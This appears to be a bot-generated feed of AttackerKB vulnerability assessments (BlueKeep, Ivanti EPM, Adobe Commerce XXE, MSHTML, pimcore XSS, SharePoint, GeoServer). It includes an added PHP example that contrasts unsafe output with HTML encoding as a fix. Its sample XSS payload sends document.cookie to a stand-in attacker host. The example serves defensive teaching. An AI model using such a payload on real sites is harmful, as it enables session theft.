AttackerKB bot (Unofficial)
New assessment for topic: Windows Remote Desktop (RDP) Use-after-free vulnerability, "Bluekeep"

Topic description: "A bug in Windows Remote Desktop protocol allows unauthenticated users to run arbitrary code via a specially crafted request to the service ..."

"Exploited by North Korean state-sponsored attackers according to a July 2024 bulletin from multiple U.S ..."

Link: https://attackerkb.com/assessments/8909df99-507f-4f27-a36b-9c759f2b5a9f
New assessment for topic: CVE-2024-29824

Topic description: "An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code. ..."

"Ivanti Endpoint Manager (EPM) versions 2022 SU5 and prior are vulnerable to SQL injection and a patch has been released, as described in the official [advisory](https://forums.ivanti.com/s/article/Security-Advisory-May-2024) and the related [KB article](https://forums.ivanti.com/s/article/KB-Security-Advisory-EPM-May-2024) ..."

Link: https://attackerkb.com/assessments/721f9e58-f1a2-4da1-9bdc-21a2c2e0a139
New assessment for topic: CVE-2024-34102

Topic description: "Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution ..."

"Adobe Commerce, which is based on the Magento PHP suite, is a popular framework for commerce websites ..."

Link: https://attackerkb.com/assessments/d33dff0d-d59a-4d35-ae3b-542784621174
New assessment for topic: CVE-2024-38112

Topic description: "Windows MSHTML Platform Spoofing Vulnerability ..."

"Trend Micro reported this vulnerability to Microsoft after observing [Void Banshee APT exploitation in the wild](https://www.trendmicro.com/en_id/research/24/g/CVE-2024-38112-void-banshee.html); the zero-day attack hinged on the premise that MHTML links would automatically open in the old Internet Explorer engine ..."

Link: https://attackerkb.com/assessments/ee90728c-07aa-4213-b028-b960f305ae9c
New assessment for topic: CVE-2022-0510

Topic description: "Cross-site Scripting (XSS) - Reflected in Packagist pimcore/pimcore prior to 10.3.1. ..."

"Missing Sanitization of `$item->getGroup()` (lines 864 and 1269) in `fieldcollectionTreeAction/objectbrickTreeAction` functions in `bundles/AdminBundle/Controller/Admin/DataObject/ClassController.php` allows Admin User to perform Source Code Injection through Stored Group Fields (in Object Bricks/Field Collection under settings module) resulting in Information Exposure (cookie theft). ..."

Link: https://attackerkb.com/assessments/cd11e0f9-6a68-4d14-b233-1fa6126daceb
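As an added illustration of the stored-XSS pattern the assessment above describes, not pimcore's own code: a group name that is emitted into an admin tree node unescaped, next to the same node built with the value HTML-encoded first. The function names, the `$storedGroup` sample value and the node layout are assumptions for the example; only the idea (a stored "group" field reaching the admin UI without sanitization) comes from the assessment.

```php
<?php
// Added example, not pimcore's code. Function names and the node shape are
// assumptions; the sample group value is constructed for the demonstration.

// Constructed sample: a "group" value an admin could save under
// Settings > Object Bricks / Field Collections.
$storedGroup = '<img src=x onerror="location=\'//attacker.example/?c=\'+document.cookie">';

// Vulnerable pattern: the stored group text goes into the tree node's
// display text as-is, so the browser parses the payload as markup.
function buildTreeNodeUnsafe(string $group, string $name): array
{
    return [
        'text' => $group . ' - ' . $name,
        'leaf' => true,
    ];
}

// Hardened pattern: encode for an HTML context before the value reaches
// the UI. ENT_QUOTES also neutralises attribute-breaking quotes, and
// ENT_SUBSTITUTE avoids silently returning '' on invalid UTF-8.
function buildTreeNodeSafe(string $group, string $name): array
{
    $enc = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return [
        'text' => $enc($group) . ' - ' . $enc($name),
        'leaf' => true,
    ];
}

$unsafe = buildTreeNodeUnsafe($storedGroup, 'brick1');
$safe   = buildTreeNodeSafe($storedGroup, 'brick1');

// Check a reviewer can run: raw tag markup survives in the unsafe node text
// but not in the encoded one, so the payload is displayed, not executed.
var_dump(strpos($unsafe['text'], '<img') !== false);
var_dump(strpos($safe['text'], '<img') !== false);
echo json_encode($safe, JSON_PRETTY_PRINT), PHP_EOL;
```

Encoding at the point where the value is written into the HTML context (rather than on input) is the durable fix: the same stored string may later be rendered in JSON, logs or an ExtJS template, and each sink needs its own context-appropriate encoding.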
New assessment for topic: CVE-2024-38023

Topic description: "Microsoft SharePoint Server Remote Code Execution Vulnerability ..."

"This vulnerability also requires authentication, but any SharePoint user with Site Owner permissions can hit it ..."

Link: https://attackerkb.com/assessments/876bb98d-a8d3-4b1c-8e7c-f270880d3f1e
New assessment for topic: CVE-2024-36401

Topic description: "GeoServer is an open source server that allows users to share and edit geospatial data ..."

"[metadata only] ..."

Link: https://attackerkb.com/assessments/becffd24-1aa0-4f40-8adb-2427538a6c7a